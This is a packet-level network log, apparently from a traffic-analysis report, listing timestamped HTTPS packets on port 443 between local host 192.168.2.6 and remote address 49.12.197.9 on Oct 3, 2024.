                                                                                                                                                                  Oct 3, 2024 03:36:18.225634098 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.225653887 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.225790977 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.225802898 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.225835085 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.258606911 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.258630037 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.258748055 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.258759022 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.258807898 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.288316011 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.288336039 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.288436890 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.288449049 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.288490057 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.306829929 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.306848049 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.306945086 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.306952953 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.306996107 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.324242115 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.324261904 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.324338913 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.324347019 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.324384928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.341396093 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.341417074 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.341491938 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.341504097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.341550112 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.355856895 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.355927944 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.355978966 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.356009960 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.356024981 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.356054068 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.372554064 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.372605085 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.372658014 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.372668028 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.372698069 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.372716904 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.385797024 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.385850906 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.385905981 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.385921001 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.385935068 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.385970116 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.400552988 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.400604010 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.400650978 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.400671959 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.400703907 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.400713921 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.411834002 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.411878109 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.411931038 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.411938906 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.411967039 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.411989927 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.420324087 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.420372009 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.420422077 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.420432091 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.420459986 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.420478106 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.429898977 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.429948092 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.430002928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.430011034 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.430039883 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.430052996 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.438523054 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.438544035 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.438616991 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.438628912 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.438664913 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.445452929 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.445470095 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.445584059 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.445594072 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.445637941 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.456468105 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.456499100 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.456620932 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.456630945 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.456674099 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.470177889 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.470222950 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.470283985 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.470294952 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.470325947 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.470345974 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.482950926 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.482991934 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.483055115 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.483067989 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.483216047 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.483216047 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.495215893 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.495259047 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.495313883 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.495333910 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.495469093 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.495470047 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.503844976 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.503887892 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.503926992 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.503945112 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.503961086 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.503979921 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.513782024 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.513823986 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.513926983 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.513952017 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.513978004 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.513999939 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.531766891 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.531809092 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.531958103 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.531991005 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.532130957 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.533552885 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.533607006 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.533649921 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.533658028 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.533687115 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.533703089 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.538099051 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.538142920 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.538248062 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.538259029 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.538270950 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.538304090 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.556788921 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.556816101 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.556910992 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.556930065 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.556967974 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.569581985 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.569644928 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.569675922 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.569705009 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.569833040 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.569833040 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.582056999 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.582108974 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.582143068 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.582153082 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.582187891 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.582206964 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.590647936 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.590692043 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.590776920 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.590785980 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.590812922 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.590841055 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.600732088 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.600779057 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.600812912 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.600821018 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.600845098 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.600867033 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.615216970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.615258932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.615319967 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.615319967 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.615329027 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.615371943 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.616950989 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.616991997 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.617019892 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.617027044 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.617038012 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.617072105 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.624618053 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.624661922 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.624700069 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.624706984 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.624722958 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.624747992 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.643877983 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.643927097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.643963099 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.643975019 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.643987894 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.644011974 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.656443119 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.656486034 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.656543016 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.656543016 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.656552076 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.656593084 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.668864012 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.668910980 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.668975115 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.668975115 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.668983936 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.669028044 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.677597046 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.677639961 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.677675962 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.677685022 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.677694082 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.677725077 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.688716888 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.688757896 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.688788891 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.688796997 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.688813925 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.688838005 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.702111006 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.702171087 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.702205896 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.702223063 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.702238083 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.702259064 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.703728914 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.703774929 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.703797102 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.703808069 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.703830004 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.703844070 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.711375952 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.711417913 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.711476088 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.711483955 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.711527109 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.711719990 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.730402946 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.730423927 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.730562925 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.730595112 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.730639935 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.743246078 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.743293047 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.743396997 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.743406057 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.743443012 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.743459940 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.755521059 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.755584002 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.755654097 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.755664110 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.755708933 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.755724907 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.764266968 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.764333963 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.764398098 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.764408112 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.764446020 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.764466047 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.774363041 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.774409056 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.774524927 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.774569035 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.774624109 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.774624109 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.789108038 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.789160013 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.789280891 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.789318085 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.789355993 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.789377928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.790509939 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.790551901 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.790610075 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.790623903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.790656090 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.790677071 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.798306942 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.798369884 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.798405886 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.798413992 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.798445940 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.798455000 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.817404032 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.817466021 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.817565918 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.817575932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.817634106 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.830030918 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.830075979 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.830193996 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.830219030 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.830243111 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.830270052 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.842443943 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.842494011 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.842627048 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.842653036 CEST4434973849.12.197.9192.168.2.6
